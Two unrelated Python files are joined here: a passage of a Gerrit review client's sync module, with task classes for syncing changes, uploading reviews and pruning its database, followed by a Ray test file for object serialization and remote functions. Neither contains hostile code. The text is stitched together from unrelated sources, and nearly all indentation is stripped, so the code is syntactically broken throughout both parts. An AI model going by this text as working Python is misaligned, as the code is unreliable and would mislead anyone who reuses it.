# check its local changes for missing refs and sync the associated changes
def __repr__(self):
return '<CheckReposTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
projects = session.getProjects(subscribed=True)
for project in projects:
try:
missing = False
try:
repo = gitrepo.get_repo(project.name, app.config)
except gitrepo.GitCloneError:
missing = True
if missing or app.fetch_missing_refs:
sync.submitTask(
CheckRevisionsTask(project.key,
force_fetch=app.fetch_missing_refs,
priority=LOW_PRIORITY)
)
except Exception:
self.log.exception("Exception checking repo %s" %
(project.name,))
class CheckRevisionsTask(Task):
def __init__(self, project_key, force_fetch=False,
priority=NORMAL_PRIORITY):
super(CheckRevisionsTask, self).__init__(priority)
self.project_key = project_key
self.force_fetch = force_fetch
def __repr__(self):
return '<CheckRevisionsTask %s>' % (self.project_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_key == self.project_key):
return True
return False
def run(self, sync):
app = sync.app
to_sync = set()
with app.db.getSession() as session:
project = session.getProject(self.project_key)
repo = None
try:
repo = gitrepo.get_repo(project.name, app.config)
except gitrepo.GitCloneError:
pass
for change in project.open_changes:
if repo:
for revision in change.revisions:
if repo.checkCommits([revision.parent, revision.commit]):
to_sync.add(change.id)
else:
to_sync.add(change.id)
for change_id in to_sync:
sync.submitTask(SyncChangeTask(change_id,
force_fetch=self.force_fetch,
priority=self.priority))
class UploadReviewsTask(Task):
def __repr__(self):
return '<UploadReviewsTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
for c in session.getPendingTopics():
sync.submitTask(SetTopicTask(c.key, self.priority))
for c in session.getPendingRebases():
sync.submitTask(RebaseChangeTask(c.key, self.priority))
for c in session.getPendingStatusChanges():
sync.submitTask(ChangeStatusTask(c.key, self.priority))
for c in session.getPendingStarred():
sync.submitTask(ChangeStarredTask(c.key, self.priority))
for c in session.getPendingCherryPicks():
sync.submitTask(SendCherryPickTask(c.key, self.priority))
for r in session.getPendingCommitMessages():
sync.submitTask(ChangeCommitMessageTask(r.key, self.priority))
for m in session.getPendingMessages():
sync.submitTask(UploadReviewTask(m.key, self.priority))
class SetTopicTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(SetTopicTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<SetTopicTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
data = dict(topic=change.topic)
change.pending_topic = False
# Inside db session for rollback
sync.put('changes/%s/topic' % (change.id,),
data)
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class RebaseChangeTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(RebaseChangeTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<RebaseChangeTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
change.pending_rebase = False
# Inside db session for rollback
sync.post('changes/%s/rebase' % (change.id,), {})
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class ChangeStarredTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(ChangeStarredTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<ChangeStarredTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
if change.starred:
sync.put('accounts/self/starred.changes/%s' % (change.id,),
data={})
else:
sync.delete('accounts/self/starred.changes/%s' % (change.id,),
data={})
change.pending_starred = False
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class ChangeStatusTask(Task):
def __init__(self, change_key, priority=NORMAL_PRIORITY):
super(ChangeStatusTask, self).__init__(priority)
self.change_key = change_key
def __repr__(self):
return '<ChangeStatusTask %s>' % (self.change_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_key == self.change_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.change_key)
if change.pending_status_message:
data = dict(message=change.pending_status_message)
else:
data = {}
change.pending_status = False
change.pending_status_message = None
# Inside db session for rollback
if change.status == 'ABANDONED':
sync.post('changes/%s/abandon' % (change.id,),
data)
elif change.status == 'NEW':
sync.post('changes/%s/restore' % (change.id,),
data)
elif change.status == 'SUBMITTED':
sync.post('changes/%s/submit' % (change.id,), {})
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class SendCherryPickTask(Task):
def __init__(self, cp_key, priority=NORMAL_PRIORITY):
super(SendCherryPickTask, self).__init__(priority)
self.cp_key = cp_key
def __repr__(self):
return '<SendCherryPickTask %s>' % (self.cp_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.cp_key == self.cp_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
cp = session.getPendingCherryPick(self.cp_key)
data = dict(message=cp.message,
destination=cp.branch)
session.delete(cp)
# Inside db session for rollback
ret = sync.post('changes/%s/revisions/%s/cherrypick' %
(cp.revision.change.id, cp.revision.commit),
data)
if ret and 'id' in ret:
sync.submitTask(SyncChangeTask(ret['id'], priority=self.priority))
class ChangeCommitMessageTask(Task):
def __init__(self, revision_key, priority=NORMAL_PRIORITY):
super(ChangeCommitMessageTask, self).__init__(priority)
self.revision_key = revision_key
def __repr__(self):
return '<ChangeCommitMessageTask %s>' % (self.revision_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.revision_key == self.revision_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
revision = session.getRevision(self.revision_key)
revision.pending_message = False
data = dict(message=revision.message)
# Inside db session for rollback
if sync.version < (2,11,0):
sync.post('changes/%s/revisions/%s/message' %
(revision.change.id, revision.commit),
data)
else:
edit = sync.get('changes/%s/edit' % revision.change.id)
if edit is not None:
raise Exception("Edit already in progress on change %s" %
(revision.change.number,))
sync.put('changes/%s/edit:message' % (revision.change.id,), data)
sync.post('changes/%s/edit:publish' % (revision.change.id,), {})
change_id = revision.change.id
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class UploadReviewTask(Task):
def __init__(self, message_key, priority=NORMAL_PRIORITY):
super(UploadReviewTask, self).__init__(priority)
self.message_key = message_key
def __repr__(self):
return '<UploadReviewTask %s>' % (self.message_key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.message_key == self.message_key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
message = session.getMessage(self.message_key)
if message is None:
self.log.debug("Message %s has already been uploaded" % (
self.message_key))
return
change = message.revision.change
if not change.held:
self.log.debug("Syncing %s to find out if it should be held" % (change.id,))
t = SyncChangeTask(change.id)
t.run(sync)
self.results += t.results
submit = False
change_id = None
with app.db.getSession() as session:
message = session.getMessage(self.message_key)
revision = message.revision
change = message.revision.change
if change.held:
self.log.debug("Not uploading review to %s because it is held" %
(change.id,))
return
change_id = change.id
current_revision = change.revisions[-1]
if change.pending_status and change.status == 'SUBMITTED':
submit = True
data = dict(message=message.message,
strict_labels=False)
if revision == current_revision:
data['labels'] = {}
for approval in change.draft_approvals:
data['labels'][approval.category] = approval.value
session.delete(approval)
comments = {}
for file in revision.files:
if file.draft_comments:
comment_list = []
for comment in file.draft_comments:
d = dict(line=comment.line,
message=comment.message)
if comment.parent:
d['side'] = 'PARENT'
comment_list.append(d)
session.delete(comment)
comments[file.path] = comment_list
if comments:
data['comments'] = comments
session.delete(message)
# Inside db session for rollback
sync.post('changes/%s/revisions/%s/review' % (change.id, revision.commit),
data)
if submit:
# Use a separate db session in case the submit fails after the
# message post has already succeeded
with app.db.getSession() as session:
change = session.getChangeByID(change_id)
change.pending_status = False
change.pending_status_message = None
sync.post('changes/%s/submit' % (change_id,), {})
sync.submitTask(SyncChangeTask(change_id, priority=self.priority))
class PruneDatabaseTask(Task):
def __init__(self, age, priority=NORMAL_PRIORITY):
super(PruneDatabaseTask, self).__init__(priority)
self.age = age
def __repr__(self):
return '<PruneDatabaseTask %s>' % (self.age,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.age == self.age):
return True
return False
def run(self, sync):
if not self.age:
return
app = sync.app
with app.db.getSession() as session:
for change in session.getChanges('status:closed age:%s' % self.age):
t = PruneChangeTask(change.key, priority=self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = VacuumDatabaseTask(priority=self.priority)
self.tasks.append(t)
sync.submitTask(t)
class PruneChangeTask(Task):
def __init__(self, key, priority=NORMAL_PRIORITY):
super(PruneChangeTask, self).__init__(priority)
self.key = key
def __repr__(self):
return '<PruneChangeTask %s>' % (self.key,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.key == self.key):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
change = session.getChange(self.key)
if not change:
return
repo = gitrepo.get_repo(change.project.name, app.config)
self.log.info("Pruning %s change %s status:%s updated:%s" % (
change.project.name, change.number, change.status, change.updated))
change_ref = None
for revision in change.revisions:
if change_ref is None:
change_ref = '/'.join(revision.fetch_ref.split('/')[:-1])
self.log.info("Deleting %s ref %s" % (
change.project.name, revision.fetch_ref))
repo.deleteRef(revision.fetch_ref)
self.log.info("Deleting %s ref %s" % (
change.project.name, change_ref))
try:
repo.deleteRef(change_ref)
except OSError as e:
if e.errno not in [errno.EISDIR, errno.EPERM]:
raise
session.delete(change)
class VacuumDatabaseTask(Task):
def __init__(self, priority=NORMAL_PRIORITY):
super(VacuumDatabaseTask, self).__init__(priority)
def __repr__(self):
return '<VacuumDatabaseTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
session.vacuum()
class Sync(object):
def __init__(self, app, disable_background_sync):
self.user_agent = 'Gertty/%s %s' % (gertty.version.version_info.release_string(),
requests.utils.default_user_agent())
self.version = (0, 0, 0)
self.offline = False
self.account_id = None
self.app = app
self.log = logging.getLogger('gertty.sync')
self.queue = MultiQueue([HIGH_PRIORITY, NORMAL_PRIORITY, LOW_PRIORITY])
self.result_queue = queue.Queue()
self.session = requests.Session()
if self.app.config.auth_type == 'basic':
authclass = requests.auth.HTTPBasicAuth
elif self.app.config.auth_type == 'form':
authclass = FormAuth
else:
authclass = requests.auth.HTTPDigestAuth
self.auth = authclass(
self.app.config.username, self.app.config.password)
self.submitTask(GetVersionTask(HIGH_PRIORITY))
self.submitTask(SyncOwnAccountTask(HIGH_PRIORITY))
if not disable_background_sync:
self.submitTask(CheckReposTask(HIGH_PRIORITY))
self.submitTask(UploadReviewsTask(HIGH_PRIORITY))
self.submitTask(SyncProjectListTask(HIGH_PRIORITY))
self.submitTask(SyncSubscribedProjectsTask(NORMAL_PRIORITY))
self.submitTask(SyncSubscribedProjectBranchesTask(LOW_PRIORITY))
self.submitTask(SyncOutdatedChangesTask(LOW_PRIORITY))
self.submitTask(PruneDatabaseTask(self.app.config.expire_age, LOW_PRIORITY))
self.periodic_thread = threading.Thread(target=self.periodicSync)
self.periodic_thread.daemon = True
self.periodic_thread.start()
def periodicSync(self):
hourly = time.time()
while True:
try:
time.sleep(60)
self.syncSubscribedProjects()
now = time.time()
if now-hourly > 3600:
hourly = now
self.pruneDatabase()
self.syncOutdatedChanges()
except Exception:
self.log.exception('Exception in periodicSync')
def submitTask(self, task):
if not self.offline:
if not self.queue.put(task, task.priority):
task.complete(False)
else:
task.complete(False)
def run(self, pipe):
task = None
while True:
task = self._run(pipe, task)
def _run(self, pipe, task=None):
if not task:
task = self.queue.get()
self.log.debug('Run: %s' % (task,))
try:
task.run(self)
task.complete(True)
self.queue.complete(task)
except (requests.ConnectionError, OfflineError,
requests.exceptions.ChunkedEncodingError,
requests.exceptions.ReadTimeout
) as e:
self.log.warning("Offline due to: %s" % (e,))
if not self.offline:
self.submitTask(GetVersionTask(HIGH_PRIORITY))
self.submitTask(UploadReviewsTask(HIGH_PRIORITY))
self.offline = True
self.app.status.update(offline=True, refresh=False)
os.write(pipe, six.b('refresh\n'))
time.sleep(30)
return task
except Exception:
task.complete(False)
self.queue.complete(task)
self.log.exception('Exception running task %s' % (task,))
self.app.status.update(error=True, refresh=False)
self.offline = False
self.app.status.update(offline=False, refresh=False)
for r in task.results:
self.result_queue.put(r)
os.write(pipe, six.b('refresh\n'))
return None
def url(self, path):
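# Gerrit exposes its authenticated REST API under the /a/ path prefix.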
return self.app.config.url + 'a/' + path
def checkResponse(self, response):
self.log.debug('HTTP status code: %d', response.status_code)
if response.status_code == 503:
raise OfflineError("Received 503 status code")
def get(self, path):
url = self.url(path)
self.log.debug('GET: %s' % (url,))
r = self.session.get(url,
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Accept': 'application/json',
'Accept-Encoding': 'gzip',
'User-Agent': self.user_agent})
self.checkResponse(r)
if r.status_code == 200:
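            # Gerrit prefixes JSON responses with ")]}'" to defeat XSSI;
            # strip those four characters before parsing.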
ret = json.loads(r.text[4:])
if len(ret):
self.log.debug('200 OK, Received: %s' % (ret,))
else:
self.log.debug('200 OK, No body.')
return ret
def post(self, path, data):
url = self.url(path)
self.log.debug('POST: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.post(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
ret = None
if r.status_code > 400:
raise Exception("POST to %s failed with http code %s (%s)",
path, r.status_code, r.text)
if r.text and len(r.text)>4:
try:
ret = json.loads(r.text[4:])
except Exception:
self.log.exception("Unable to parse result %s from post to %s" %
(r.text, url))
raise
return ret
def put(self, path, data):
url = self.url(path)
self.log.debug('PUT: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.put(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
def delete(self, path, data):
url = self.url(path)
self.log.debug('DELETE: %s' % (url,))
self.log.debug('data: %s' % (data,))
r = self.session.delete(url, data=json.dumps(data).encode('utf8'),
verify=self.app.config.verify_ssl,
auth=self.auth, timeout=TIMEOUT,
headers = {'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': self.user_agent})
self.checkResponse(r)
self.log.debug('Received: %s' % (r.text,))
def syncSubscribedProjects(self):
task = SyncSubscribedProjectsTask(LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def pruneDatabase(self):
task = PruneDatabaseTask(self.app.config.expire_age, LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def syncOutdatedChanges(self):
task = SyncOutdatedChangesTask(LOW_PRIORITY)
self.submitTask(task)
if task.wait():
for subtask in task.tasks:
subtask.wait()
def _syncChangeByCommit(self, commit, priority):
# Accumulate sync change by commit tasks because they often
# come in batches. This method assumes it is being called
# from within the run queue already and therefore does not
# need to worry about locking the queue.
task = None
for task in self.queue.find(SyncChangesByCommitsTask, priority):
if task.addCommit(commit):
return
task = SyncChangesByCommitsTask([commit], priority)
self.submitTask(task)
def setRemoteVersion(self, version):
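        # Parse the remote version string into a (major, minor, micro)
        # tuple, ignoring anything after the first '-'.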
base = version.split('-')[0]
parts = base.split('.')
major = minor = micro = 0
if len(parts) > 0:
major = int(parts[0])
if len(parts) > 1:
minor = int(parts[1])
if len(parts) > 2:
micro = int(parts[2])
self.version = (major, minor, micro)
self.log.info("Remote version is: %s (parsed as %s)" % (version, self.version))
def query(self, queries):
changes = []
sortkey = ''
done = False
offset = 0
while not done:
query = '&'.join(queries)
# We don't actually want to limit to 500, but that's the server-side default, and
# if we don't specify this, we won't get a _more_changes flag.
q = 'changes/?n=500%s&%s' % (sortkey, query)
self.log.debug('Query: %s' % (q,))
responses = self.get(q)
            if len(queries) == 1:
                responses = [responses]
            done = True
for batch in responses:
changes += batch
if batch and '_more_changes' in batch[-1]:
done = False
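                    # Older Gerrit servers page with a sortkey (N=...);
                    # newer ones use an offset (start=...).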
if '_sortkey' in batch[-1]:
sortkey = '&N=%s' % (batch[-1]['_sortkey'],)
else:
offset += len(batch)
sortkey = '&start=%s' % (offset,)
return changes
|
test_basic.py
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import glob
import io
import json
import logging
from multiprocessing import Process
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.ray_constants as ray_constants
import ray.tests.cluster_utils
import ray.tests.utils
from ray.tests.utils import RayTestTimeoutException
logger = logging.getLogger(__name__)
def test_simple_serialization(ray_start_regular):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
if sys.version_info < (3, 0):
primitive_objects.append(long(0)) # noqa: E501,F821
    composite_objects = (
        [[obj] for obj in primitive_objects] +
        [(obj, ) for obj in primitive_objects] +
        [{(): obj} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start_regular):
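    # Recursive equality helper that special-cases numpy values, objects
    # with a __dict__, dicts, lists, tuples, and namedtuples.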
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass(object):
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
    DICT_OBJECTS = (
        [{obj: obj} for obj in PRIMITIVE_OBJECTS
         if obj.__hash__ is not None and type(obj).__module__ != "numpy"] +
        [{0: obj} for obj in BASE_OBJECTS] +
        [{Foo(123): Foo(456)}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
# Test StringIO serialization
s = io.StringIO(u"Hello, world!\n")
s.seek(0)
line = s.readline()
s.seek(0)
assert ray.get(ray.put(s)).readline() == line
def test_nested_functions(ray_start_regular):
# Make sure that remote functions can use other values that are defined
# after the remote function but before the first function invocation.
@ray.remote
def f():
return g(), ray.get(h.remote())
def g():
return 1
@ray.remote
def h():
return 2
assert ray.get(f.remote()) == (1, 2)
# Test a remote function that recursively calls itself.
@ray.remote
def factorial(n):
if n == 0:
return 1
return n * ray.get(factorial.remote(n - 1))
assert ray.get(factorial.remote(0)) == 1
assert ray.get(factorial.remote(1)) == 1
assert ray.get(factorial.remote(2)) == 2
assert ray.get(factorial.remote(3)) == 6
assert ray.get(factorial.remote(4)) == 24
assert ray.get(factorial.remote(5)) == 120
# Test remote functions that recursively call each other.
@ray.remote
def factorial_even(n):
assert n % 2 == 0
if n == 0:
return 1
return n * ray.get(factorial_odd.remote(n - 1))
@ray.remote
def factorial_odd(n):
assert n % 2 == 1
return n * ray.get(factorial_even.remote(n - 1))
assert ray.get(factorial_even.remote(4)) == 24
assert ray.get(factorial_odd.remote(5)) == 120
def test_ray_recursive_objects(ray_start_regular):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
if ray.worker.USE_NEW_SERIALIZER:
# Serialize the recursive objects.
for obj in recursive_objects:
ray.put(obj)
else:
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start_regular):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start_regular):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(ray_start_regular):
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start_regular):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(ray_start_2_cpus):
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1(object):
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2(object):
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
